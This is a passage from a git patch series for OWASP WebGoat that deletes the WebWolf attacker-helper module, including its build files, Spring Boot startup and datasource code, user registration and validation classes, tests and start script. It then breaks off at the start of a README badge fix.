-    public static void main(String[] args) {
-        log.info("Starting WebGoat with args: {}", StringUtils.arrayToCommaDelimitedString(args));
-        System.setProperty("spring.config.name", "application-webgoat");
-
-        String webgoatPort = System.getenv("WEBGOAT_PORT");
-        String databasePort = System.getenv("WEBGOAT_HSQLPORT");
-        String webGoatHost = null == System.getenv("WEBGOAT_HOST") ? "127.0.0.1" : System.getenv("WEBGOAT_HOST");
-        int goatPort = webgoatPort == null ? 8080 : Integer.parseInt(webgoatPort);
-        int dbPort = databasePort == null ? 9001 : Integer.parseInt(databasePort);
-
-        if (isAlreadyRunning(webGoatHost, goatPort)) {
-            log.error("Port {}:{} is already in use", webGoatHost, goatPort);
-            System.out.println("Port " + webGoatHost + ":" + goatPort + " is in use. Use environment value WEBGOAT_PORT to set a different value.");
-            System.exit(-1);
-        }
-        if (isAlreadyRunning(webGoatHost, dbPort)) {
-            log.error("Port {}:{} is already in use", webGoatHost, goatPort);
-            System.out.println("Port " + webGoatHost + ":" + goatPort + " is in use. Use environment value WEBGOAT_HSQLPORT to set a different value.");
-            System.exit(-1);
-        }
-        SpringApplication.run(StartWebGoat.class, args);
-    }
-
-    private static boolean isAlreadyRunning(String host, int port) {
-        try (var ignored = new Socket(host, port)) {
-            return true;
-        } catch (IOException e) {
-            return false;
-        }
-    }
-}
diff --git a/webwolf/Dockerfile b/webwolf/Dockerfile
deleted file mode 100644
index 46598e803..000000000
--- a/webwolf/Dockerfile
+++ /dev/null
@@ -1,16 +0,0 @@
-FROM openjdk:11.0.1-jre-slim-stretch
-
-ARG webwolf_version=v8.0.0-SNAPSHOT
-
-RUN \
-  apt-get update && apt-get install && \
-  useradd --home-dir /home/webwolf --create-home -U webwolf
-
-USER webwolf
-COPY target/webwolf-${webwolf_version}.jar /home/webwolf/webwolf.jar
-COPY start-webwolf.sh /home/webwolf
-
-EXPOSE 9090
-
-ENTRYPOINT ["/home/webwolf/start-webwolf.sh"]
-CMD ["--server.port=9090", "--server.address=0.0.0.0"]
\ No newline at end of file
diff --git a/webwolf/README.md b/webwolf/README.md
deleted file mode 100644
index 52d5341c8..000000000
--- a/webwolf/README.md
+++ /dev/null
@@ -1,46 +0,0 @@
-# WebWolf
-
-## Introduction
-
-During workshops one of the feedback items was that in some lesson it was not clear what you controlled 
-as an attacker and what was part of the lesson. To make this separation more distinct we created 
-WebWolf which is completely controlled by you as the attacker and runs as a separate application. 
-
-Instead of using your own machine which would involve WebGoat being connected to your local network
-or internet (remember WebGoat is a vulnerable webapplication) we created WebWolf which is the the 
-environment for you as an attacker.
-
-At the moment WebWolf offers support for:
-
-- Receiving e-mails
-- Serving files
-- Logging of incoming requests (cookies etc)
-
-# Run instructions
-
-## 1. Run using Docker
-
-If you use the Docker image of WebGoat this application will automatically be available. Use the following 
-URL: http://localhost:9090/WebWolf
-
-## 2. Standalone
-
-```Shell
-cd WebGoat
-git checkout develop
-mvn clean install
-```
-
-Now we are ready to run the project. WebGoat 8.x is using Spring-Boot.
-
-```Shell
-mvn -pl webwolf spring-boot:run
-```
-... you should be running WebWolf on localhost:9090/WebWolf momentarily
-
-
-
-### Mapping
-
-The web application runs on '/' and the controllers and Thymeleaf templates are hardcoded to '/WebWolf' we need
-to have '/' available which acts as a landing page for incoming requests.
\ No newline at end of file
diff --git a/webwolf/pom.xml b/webwolf/pom.xml
deleted file mode 100644
index 8bb28bfe1..000000000
--- a/webwolf/pom.xml
+++ /dev/null
@@ -1,155 +0,0 @@
-<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
-         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
-    <modelVersion>4.0.0</modelVersion>
-    <artifactId>webwolf</artifactId>
-    <packaging>jar</packaging>
-    <parent>
-        <groupId>org.owasp.webgoat</groupId>
-        <artifactId>webgoat-parent</artifactId>
-        <version>8.2.3-SNAPSHOT</version>
-    </parent>
-
-    <dependencies>
-    	<dependency>
-			<groupId>org.springframework.boot</groupId>
-			<artifactId>spring-boot-starter-validation</artifactId>
-		</dependency>
-        <dependency>
-            <groupId>com.fasterxml.jackson.datatype</groupId>
-            <artifactId>jackson-datatype-jsr310</artifactId>
-        </dependency>
-        <dependency>
-            <groupId>com.google.guava</groupId>
-            <artifactId>guava</artifactId>
-            <version>${guava.version}</version>
-        </dependency>
-        <dependency>
-            <groupId>org.projectlombok</groupId>
-            <artifactId>lombok</artifactId>
-        </dependency>
-        <dependency>
-            <groupId>commons-io</groupId>
-            <artifactId>commons-io</artifactId>
-            <version>${commons-io.version}</version>
-        </dependency>
-        <dependency>
-            <groupId>org.apache.commons</groupId>
-            <artifactId>commons-lang3</artifactId>
-        </dependency>
-        <dependency>
-            <groupId>org.bitbucket.b_c</groupId>
-            <artifactId>jose4j</artifactId>
-            <version>0.7.6</version>
-        </dependency>
-        <dependency>
-            <groupId>org.springframework.boot</groupId>
-            <artifactId>spring-boot-starter-security</artifactId>
-        </dependency>
-        <dependency>
-            <groupId>org.springframework.boot</groupId>
-            <artifactId>spring-boot-starter-undertow</artifactId>
-        </dependency>
-        <dependency>
-            <groupId>org.springframework.boot</groupId>
-            <artifactId>spring-boot-starter-web</artifactId>
-            <exclusions>
-                <exclusion>
-                    <groupId>org.springframework.boot</groupId>
-                    <artifactId>spring-boot-starter-tomcat</artifactId>
-                </exclusion>
-            </exclusions>
-        </dependency>
-        <dependency>
-            <groupId>org.springframework.boot</groupId>
-            <artifactId>spring-boot-starter-thymeleaf</artifactId>
-        </dependency>
-        <dependency>
-            <groupId>org.springframework.boot</groupId>
-            <artifactId>spring-boot-starter-actuator</artifactId>
-            <exclusions>
-                <exclusion>
-                    <groupId>org.apache.logging.log4j</groupId>
-                    <artifactId>log4j-api</artifactId>
-                </exclusion>
-                <exclusion>
-                    <groupId>org.apache.logging.log4j</groupId>
-                    <artifactId>log4j-to-slf4j</artifactId>
-                </exclusion>
-            </exclusions>
-        </dependency>
-        <dependency>
-            <groupId>org.springframework.retry</groupId>
-            <artifactId>spring-retry</artifactId>
-        </dependency>
-        <dependency>
-            <groupId>org.thymeleaf.extras</groupId>
-            <artifactId>thymeleaf-extras-springsecurity5</artifactId>
-        </dependency>
-        <dependency>
-            <groupId>org.springframework.boot</groupId>
-            <artifactId>spring-boot-starter-data-jpa</artifactId>
-        </dependency>
-        <dependency>
-            <groupId>org.springframework.boot</groupId>
-            <artifactId>spring-boot-devtools</artifactId>
-            <optional>true</optional>
-        </dependency>
-
-        <dependency>
-            <groupId>org.webjars</groupId>
-            <artifactId>bootstrap</artifactId>
-            <version>3.3.7</version>
-        </dependency>
-        <dependency>
-            <groupId>org.webjars</groupId>
-            <artifactId>jquery</artifactId>
-            <version>3.5.1</version>
-        </dependency>
-        <dependency>
-            <groupId>org.hsqldb</groupId>
-            <artifactId>hsqldb</artifactId>
-        </dependency>
-        <dependency>
-            <groupId>org.postgresql</groupId>
-            <artifactId>postgresql</artifactId>
-        </dependency>
-
-        <!-- ************* START: Dependencies for Unit and Integration Testing ************** -->
-        <dependency>
-            <groupId>org.springframework.boot</groupId>
-            <artifactId>spring-boot-starter-test</artifactId>
-            <scope>test</scope>
-        </dependency>
-        <dependency>
-            <groupId>org.springframework.security</groupId>
-            <artifactId>spring-security-test</artifactId>
-            <scope>test</scope>
-        </dependency>
-    </dependencies>
-
-    <build>
-        <plugins>
-            <plugin>
-                <groupId>org.springframework.boot</groupId>
-                <artifactId>spring-boot-maven-plugin</artifactId>
-            </plugin>
-            <plugin>
-                <groupId>org.apache.maven.plugins</groupId>
-                <artifactId>maven-jar-plugin</artifactId>
-                <executions>
-                    <execution>
-                        <phase>test-compile</phase>
-                        <goals>
-                            <goal>jar</goal>
-                        </goals>
-                        <configuration>
-                            <classifier>internal</classifier>
-                        </configuration>
-                    </execution>
-                </executions>
-            </plugin>
-        </plugins>
-    </build>
-
-
-</project>
\ No newline at end of file
diff --git a/webwolf/src/main/java/org/owasp/webwolf/WebWolf.java b/webwolf/src/main/java/org/owasp/webwolf/WebWolf.java
deleted file mode 100644
index 029268003..000000000
--- a/webwolf/src/main/java/org/owasp/webwolf/WebWolf.java
+++ /dev/null
@@ -1,73 +0,0 @@
-/*
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details, please see http://www.owasp.org/
- *
- * Copyright (c) 2002 - 2019 Bruce Mayhew
- *
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- *
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- *
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- *
- * Getting Source ==============
- *
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
- */
-
-package org.owasp.webwolf;
-
-import java.io.IOException;
-import java.net.Socket;
-
-import org.owasp.webwolf.requests.WebWolfTraceRepository;
-import org.springframework.beans.factory.annotation.Autowired;
-import org.springframework.boot.SpringApplication;
-import org.springframework.boot.actuate.trace.http.HttpTraceRepository;
-import org.springframework.boot.autoconfigure.SpringBootApplication;
-import org.springframework.context.annotation.Bean;
-import org.springframework.context.annotation.Profile;
-
-@SpringBootApplication
-public class WebWolf {
-
-    @Bean
-    public HttpTraceRepository traceRepository() {
-        return new WebWolfTraceRepository();
-    }
-
-    public static void main(String[] args) {
-        System.setProperty("spring.config.name", "application-webwolf");
-
-        String webwolfPort = System.getenv("WEBWOLF_PORT");
-        String webWolfHost = null == System.getenv("WEBWOLF_HOST") ? "127.0.0.1" : System.getenv("WEBWOLF_HOST");
-        String fileEncoding = System.getProperty("file.encoding");
-
-        int wolfPort = webwolfPort == null ? 9090 : Integer.parseInt(webwolfPort);
-
-        if (null == fileEncoding || !fileEncoding.equals("UTF-8")) {
-            System.out.println("It seems the application is started on a OS with non default UTF-8 encoding:" + fileEncoding);
-            System.out.println("Please add: -Dfile.encoding=UTF-8");
-            System.exit(-1);
-        }
-
-        if (isAlreadyRunning(webWolfHost, wolfPort)) {
-            System.out.println("Port " + webWolfHost + ":" + wolfPort + " is in use. Use environment value WEBWOLF_PORT to set a different value.");
-            System.exit(-1);
-        }
-        SpringApplication.run(WebWolf.class, args);
-    }
-
-    private static boolean isAlreadyRunning(String host, int port) {
-        try (var ignored = new Socket(host, port)) {
-            return true;
-        } catch (IOException e) {
-            return false;
-        }
-    }
-}
diff --git a/webwolf/src/main/java/org/owasp/webwolf/db/ActuatorDsJsonParser.java b/webwolf/src/main/java/org/owasp/webwolf/db/ActuatorDsJsonParser.java
deleted file mode 100644
index 56353d344..000000000
--- a/webwolf/src/main/java/org/owasp/webwolf/db/ActuatorDsJsonParser.java
+++ /dev/null
@@ -1,58 +0,0 @@
-/*
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details, please see http://www.owasp.org/
- *
- * Copyright (c) 2002 - 2021 Bruce Mayhew
- *
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- *
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- *
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- *
- * Getting Source ==============
- *
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
- */
-
-package org.owasp.webwolf.db;
-
-import com.fasterxml.jackson.databind.JsonNode;
-
-import lombok.AccessLevel;
-import lombok.NoArgsConstructor;
-
-/**
- * 
- * @author Angel Olle Blazquez
- *
- */
-
-@NoArgsConstructor(access = AccessLevel.PRIVATE)
-public final class ActuatorDsJsonParser {
-
-    protected static final String getDsPropertyFromConfigProps(JsonNode node, String propertyName) {
-        return node
-            .get("application")
-            .get("beans")
-            .get("spring.datasource-org.springframework.boot.autoconfigure.jdbc.DataSourceProperties")
-            .get("properties")
-            .get(propertyName)
-            .asText();
-    }
-
-    protected static final String getDsHealthStatus(JsonNode node) {
-        return node
-            .get("components")
-            .get("db")
-            .get("components")
-            .get("dataSource")
-            .get("status")
-            .asText();
-    }
-}
diff --git a/webwolf/src/main/java/org/owasp/webwolf/db/DataSourceProperties.java b/webwolf/src/main/java/org/owasp/webwolf/db/DataSourceProperties.java
deleted file mode 100644
index 7f493fd7d..000000000
--- a/webwolf/src/main/java/org/owasp/webwolf/db/DataSourceProperties.java
+++ /dev/null
@@ -1,52 +0,0 @@
-/*
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details, please see http://www.owasp.org/
- *
- * Copyright (c) 2002 - 2021 Bruce Mayhew
- *
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- *
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- *
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- *
- * Getting Source ==============
- *
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
- */
-
-package org.owasp.webwolf.db;
-
-import static org.owasp.webwolf.db.ActuatorDsJsonParser.getDsPropertyFromConfigProps;
-
-import java.io.Serializable;
-
-import com.fasterxml.jackson.annotation.JsonProperty;
-import com.fasterxml.jackson.databind.JsonNode;
-
-import lombok.Data;
-
-/**
- * 
- * @author Angel Olle Blazquez
- *
- */
-
-@Data
-public class DataSourceProperties implements Serializable {
-    private static final long serialVersionUID = -5897408528235134090L;
-    private String url;
-    private String driverClassName;
-
-    @JsonProperty("contexts")
-    protected void props(JsonNode node) {
-        url = getDsPropertyFromConfigProps(node, "url");
-        driverClassName = getDsPropertyFromConfigProps(node, "driverClassName");
-    }
-
-}
diff --git a/webwolf/src/main/java/org/owasp/webwolf/db/DataSourceResolver.java b/webwolf/src/main/java/org/owasp/webwolf/db/DataSourceResolver.java
deleted file mode 100644
index c5ccce5aa..000000000
--- a/webwolf/src/main/java/org/owasp/webwolf/db/DataSourceResolver.java
+++ /dev/null
@@ -1,111 +0,0 @@
-/*
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details, please see http://www.owasp.org/
- *
- * Copyright (c) 2002 - 2021 Bruce Mayhew
- *
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- *
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- *
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- *
- * Getting Source ==============
- *
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
- */
-
-package org.owasp.webwolf.db;
-
-import static org.owasp.webwolf.db.ActuatorDsJsonParser.getDsHealthStatus;
-
-import javax.sql.DataSource;
-
-import org.springframework.beans.factory.annotation.Autowired;
-import org.springframework.beans.factory.annotation.Value;
-import org.springframework.boot.SpringApplication;
-import org.springframework.boot.web.client.RestTemplateBuilder;
-import org.springframework.context.ApplicationContext;
-import org.springframework.context.annotation.Bean;
-import org.springframework.context.annotation.DependsOn;
-import org.springframework.jdbc.datasource.DriverManagerDataSource;
-import org.springframework.retry.annotation.Backoff;
-import org.springframework.retry.annotation.EnableRetry;
-import org.springframework.retry.annotation.Recover;
-import org.springframework.retry.annotation.Retryable;
-import org.springframework.stereotype.Component;
-import org.springframework.web.client.RestTemplate;
-
-import com.fasterxml.jackson.databind.JsonNode;
-
-import lombok.extern.slf4j.Slf4j;
-
-/**
- * 
- * @author Angel Olle Blazquez
- *
- */
-
-@Slf4j
-@Component
-@EnableRetry
-public class DataSourceResolver {
-
-    @Value("${webgoat.actuator.base.url}")
-    private String baseUrl;
-
-    @Value("${webgoat.actuator.health.db.path:/health}")
-    private String dbHealthPath;
-
-    @Value("${webgoat.actuator.configprops.path:/configprops}")
-    private String configPropsPath;
-    
-    @Autowired
-    ApplicationContext ctx;
-
-    @Bean
-    @DependsOn("dsConfigDiscovery")
-    public DataSource dataSource(DataSourceProperties dataSourceProperties) {
-        DriverManagerDataSource driverManagerDataSource = new DriverManagerDataSource(dataSourceProperties.getUrl());
-        driverManagerDataSource.setDriverClassName(dataSourceProperties.getDriverClassName());
-        return driverManagerDataSource;
-    }
-
-    @Bean
-    public RestTemplate restTemplate(RestTemplateBuilder builder) {
-        return builder.build();
-    }
-
-    @Bean
-    @Retryable(maxAttemptsExpression = "${webwolf.datasource-discovery.retry.max-attempts:5}",
-        value = Exception.class,
-        backoff = @Backoff(
-            multiplierExpression = "${webwolf.datasource-discovery.retry.backoff.multiplier:1.5}",
-            maxDelayExpression = "${webwolf.datasource-discovery.retry.backoff.max-delay:30000}",
-            delayExpression = "${webwolf.datasource-discovery.retry.backoff.delay:5000}"))
-    public DataSourceProperties dsConfigDiscovery(RestTemplate restTemplate) {
-        healthCheck(restTemplate);
-        return restTemplate.getForObject(baseUrl + configPropsPath, DataSourceProperties.class);
-    }
-
-    public void healthCheck(RestTemplate restTemplate) {
-        log.info("Checking database availability (make sure WebGoat is running)...");
-        JsonNode json = restTemplate.getForObject(baseUrl + dbHealthPath, JsonNode.class);
-        String status = getDsHealthStatus(json);
-        if (!status.equals("UP")) {
-            throw new ResourceUnavailableException();
-        }
-    }
-
-    @Recover
-    public DataSourceProperties exitOnResourceUnavailable(Exception e, RestTemplate restTemplate) {
-        log.error("It seems that the required database is not running. Please start WebGoat with the integrated or standalone database first.");
-        System.exit(SpringApplication.exit(ctx, () -> 1));
-        return null;
-    }
-}
diff --git a/webwolf/src/main/java/org/owasp/webwolf/db/ResourceUnavailableException.java b/webwolf/src/main/java/org/owasp/webwolf/db/ResourceUnavailableException.java
deleted file mode 100644
index 50f62c913..000000000
--- a/webwolf/src/main/java/org/owasp/webwolf/db/ResourceUnavailableException.java
+++ /dev/null
@@ -1,22 +0,0 @@
-package org.owasp.webwolf.db;
-
-public class ResourceUnavailableException extends RuntimeException {
-
-    private static final long serialVersionUID = 1L;
-    
-    public ResourceUnavailableException() {
-        super();
-    }
-
-    public ResourceUnavailableException(Throwable cause) {
-        super(cause);
-    }
-
-    public ResourceUnavailableException(String message) {
-        super(message);
-    }
-
-    public ResourceUnavailableException(String message, Throwable cause) {
-        super(message, cause);
-    }
-}
diff --git a/webwolf/src/main/java/org/owasp/webwolf/user/RegistrationController.java b/webwolf/src/main/java/org/owasp/webwolf/user/RegistrationController.java
deleted file mode 100644
index ecc5856ff..000000000
--- a/webwolf/src/main/java/org/owasp/webwolf/user/RegistrationController.java
+++ /dev/null
@@ -1,69 +0,0 @@
-/*
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details, please see http://www.owasp.org/
- *
- * Copyright (c) 2002 - 2019 Bruce Mayhew
- *
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- *
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- *
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- *
- * Getting Source ==============
- *
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
- */
-
-package org.owasp.webwolf.user;
-
-import lombok.AllArgsConstructor;
-import lombok.SneakyThrows;
-import lombok.extern.slf4j.Slf4j;
-import org.springframework.security.authentication.AuthenticationManager;
-import org.springframework.stereotype.Controller;
-import org.springframework.validation.BindingResult;
-import org.springframework.web.bind.annotation.GetMapping;
-import org.springframework.web.bind.annotation.ModelAttribute;
-import org.springframework.web.bind.annotation.PostMapping;
-
-import javax.servlet.http.HttpServletRequest;
-import javax.validation.Valid;
-
-/**
- * @author nbaars
- * @since 3/19/17.
- */
-@Controller
-@AllArgsConstructor
-@Slf4j
-public class RegistrationController {
-
-    private UserValidator userValidator;
-    private UserService userService;
-    private AuthenticationManager authenticationManager;
-
-    @GetMapping("/registration")
-    public String showForm(UserForm userForm) {
-        return "registration";
-    }
-
-    @PostMapping("/register.mvc")
-    @SneakyThrows
-    public String registration(@ModelAttribute("userForm") @Valid UserForm userForm, BindingResult bindingResult, HttpServletRequest request) {
-        userValidator.validate(userForm, bindingResult);
-
-        if (bindingResult.hasErrors()) {
-            return "registration";
-        }
-        userService.addUser(userForm.getUsername(), userForm.getPassword());
-        request.login(userForm.getUsername(), userForm.getPassword());
-
-        return "redirect:/WebWolf/home";
-    }
-}
diff --git a/webwolf/src/main/java/org/owasp/webwolf/user/UserValidator.java b/webwolf/src/main/java/org/owasp/webwolf/user/UserValidator.java
deleted file mode 100644
index d9c944070..000000000
--- a/webwolf/src/main/java/org/owasp/webwolf/user/UserValidator.java
+++ /dev/null
@@ -1,57 +0,0 @@
-/*
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details, please see http://www.owasp.org/
- *
- * Copyright (c) 2002 - 2019 Bruce Mayhew
- *
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- *
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- *
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- *
- * Getting Source ==============
- *
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
- */
-
-package org.owasp.webwolf.user;
-
-import lombok.AllArgsConstructor;
-import org.springframework.stereotype.Component;
-import org.springframework.validation.Errors;
-import org.springframework.validation.Validator;
-
-/**
- * @author nbaars
- * @since 3/19/17.
- */
-@Component
-@AllArgsConstructor
-public class UserValidator implements Validator {
-
-    private final UserRepository userRepository;
-
-    @Override
-    public boolean supports(Class<?> aClass) {
-        return UserForm.class.equals(aClass);
-    }
-
-    @Override
-    public void validate(Object o, Errors errors) {
-        UserForm userForm = (UserForm) o;
-
-        if (userRepository.findByUsername(userForm.getUsername()) != null) {
-            errors.rejectValue("username", "username.duplicate");
-        }
-
-        if (!userForm.getMatchingPassword().equals(userForm.getPassword())) {
-            errors.rejectValue("matchingPassword", "password.diff");
-        }
-    }
-}
diff --git a/webwolf/src/main/resources/i18n/messages.properties b/webwolf/src/main/resources/i18n/messages.properties
deleted file mode 100644
index 9e5d51223..000000000
--- a/webwolf/src/main/resources/i18n/messages.properties
+++ /dev/null
@@ -1,40 +0,0 @@
-#
-# This file is part of WebGoat, an Open Web Application Security Project utility. For details,
-# please see http://www.owasp.org/
-# <p>
-# Copyright (c) 2002 - 2017 Bruce Mayhew
-# <p>
-# This program is free software; you can redistribute it and/or modify it under the terms of the
-# GNU General Public License as published by the Free Software Foundation; either version 2 of the
-# License, or (at your option) any later version.
-# <p>
-# This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
-# even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
-# General Public License for more details.
-# <p>
-# You should have received a copy of the GNU General Public License along with this program; if
-# not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
-# 02111-1307, USA.
-# <p>
-# Getting Source ==============
-# <p>
-# Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
-# projects.
-# <p>
-#
-
-register.new=Register new user
-sign.up=Sign up
-register.title=Register 
-
-password=Password
-password.confirm=Confirm password
-username=Username
-
-
-
-not.empty=This field is required.
-username.size=Please use between 6 and 10 characters.
-username.duplicate=User already exists.
-password.size=Password should at least contain 6 characters
-password.diff=The passwords do not match.
\ No newline at end of file
diff --git a/webwolf/src/test/java/org/owasp/webwolf/user/UserValidatorTest.java b/webwolf/src/test/java/org/owasp/webwolf/user/UserValidatorTest.java
deleted file mode 100644
index 62ed987fa..000000000
--- a/webwolf/src/test/java/org/owasp/webwolf/user/UserValidatorTest.java
+++ /dev/null
@@ -1,96 +0,0 @@
-/*
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details, please see http://www.owasp.org/
- *
- * Copyright (c) 2002 - 2019 Bruce Mayhew
- *
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- *
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- *
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- *
- * Getting Source ==============
- *
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
- */
-
-package org.owasp.webwolf.user;
-
-import static org.mockito.Mockito.when;
-
-import org.assertj.core.api.Assertions;
-import org.junit.jupiter.api.Test;
-import org.junit.jupiter.api.extension.ExtendWith;
-import org.mockito.InjectMocks;
-import org.mockito.Mock;
-import org.mockito.junit.jupiter.MockitoExtension;
-import org.springframework.validation.BindException;
-
-@ExtendWith(MockitoExtension.class)
-public class UserValidatorTest {
-
-    @Mock
-    private UserRepository mockUserRepository;
-
-    @InjectMocks
-    private UserValidator userValidator;
-
-    @Test
-    public void validUserFormShouldNotHaveErrors() {
-        var validUserForm = new UserForm();
-        validUserForm.setUsername("guest");
-        validUserForm.setMatchingPassword("123");
-        validUserForm.setPassword("123");
-        BindException errors = new BindException(validUserForm, "validUserForm");
-
-        userValidator.validate(validUserForm, errors);
-
-        Assertions.assertThat(errors.hasErrors()).isFalse();
-    }
-
-    @Test
-    public void whenPasswordDoNotMatchShouldFail() {
-        var validUserForm = new UserForm();
-        validUserForm.setUsername("guest");
-        validUserForm.setMatchingPassword("123");
-        validUserForm.setPassword("124");
-        BindException errors = new BindException(validUserForm, "validUserForm");
-
-        userValidator.validate(validUserForm, errors);
-
-        Assertions.assertThat(errors.hasErrors()).isTrue();
-    }
-
-    @Test
-    public void registerExistingUserAgainShouldFail() {
-        var username = "guest";
-        var password = "123";
-        var validUserForm = new UserForm();
-        validUserForm.setUsername(username);
-        validUserForm.setMatchingPassword(password);
-        validUserForm.setPassword("124");
-        BindException errors = new BindException(validUserForm, "validUserForm");
-        var webGoatUser = new WebGoatUser(username, password);
-        when(mockUserRepository.findByUsername(validUserForm.getUsername())).thenReturn(webGoatUser);
-
-        userValidator.validate(validUserForm, errors);
-
-        Assertions.assertThat(errors.hasErrors()).isTrue();
-    }
-
-    @Test
-    public void testSupports() {
-        Assertions.assertThat(userValidator.supports(UserForm.class)).isTrue();
-    }
-
-    @Test
-    public void testSupports_false() {
-        Assertions.assertThat(userValidator.supports(UserService.class)).isFalse();
-    }
-}
\ No newline at end of file
diff --git a/webwolf/src/test/resources/logback-test.xml b/webwolf/src/test/resources/logback-test.xml
deleted file mode 100644
index a2aa1f5c1..000000000
--- a/webwolf/src/test/resources/logback-test.xml
+++ /dev/null
@@ -1,16 +0,0 @@
-<configuration>
-
-  <appender name="STDOUT" class="ch.qos.logback.core.ConsoleAppender">
-    <!-- encoders are assigned the type
-         ch.qos.logback.classic.encoder.PatternLayoutEncoder by default -->
-    <encoder>
-      <pattern>%d{HH:mm:ss.SSS} [%thread] %-5level %logger{36} - %msg%n</pattern>
-    </encoder>
-  </appender>
-  
-  <logger name="org.owasp.webgoat.plugin" level="INFO"/>
-
-  <root level="ERROR">
-    <appender-ref ref="STDOUT" />
-  </root>
-</configuration>
\ No newline at end of file
diff --git a/webwolf/start-webwolf.sh b/webwolf/start-webwolf.sh
deleted file mode 100755
index 31f0235e4..000000000
--- a/webwolf/start-webwolf.sh
+++ /dev/null
@@ -1,7 +0,0 @@
-#!/bin/bash
-
-# Script to start WebWolf, it needs a valid database connection from WebGoat so we wait 8 seconds before starting
-# WebWolf application
-
-echo " Waiting for database to be available..."
-sleep 8 && java -Djava.security.egd=file:/dev/./urandom -jar /home/webwolf/webwolf.jar $@
\ No newline at end of file

From a9fa53535dd2b856074b58565eb3c7f941d7668c Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=C3=80ngel=20Oll=C3=A9=20Bl=C3=A1zquez?= <angel@olleb.com>
Date: Mon, 11 Apr 2022 07:45:58 +0200
Subject: [PATCH 138/227] Fix Build Badge and Link (#1238)

---
 README.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/README.md b/README.md
index 8ff92be96..a5538a40a 100644
--- a/README.md
+++ b/README.md
@@ -1,6 +1,6 @@
 # WebGoat 8: A deliberately insecure Web Application
 
